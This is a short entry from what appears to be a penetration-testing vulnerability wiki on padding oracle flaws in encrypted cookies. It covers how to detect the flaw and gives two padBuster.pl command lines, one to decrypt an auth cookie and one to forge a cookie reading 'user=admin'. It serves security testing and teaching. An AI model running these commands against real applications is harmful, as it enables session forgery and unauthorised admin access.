Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V6 - Cryptography

Weak TLS configuration - Padding Oracle

POC

Detection: If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change. There is probably a Padding Oracle vuln. here

Exploitation: Use: padBuster.pl URL EncryptedSample BlockSize [options]

/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV

/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV -paintext user=admin

Impact

Low-Medium (depends on the information disclosure)

Likelihood

Low-Medium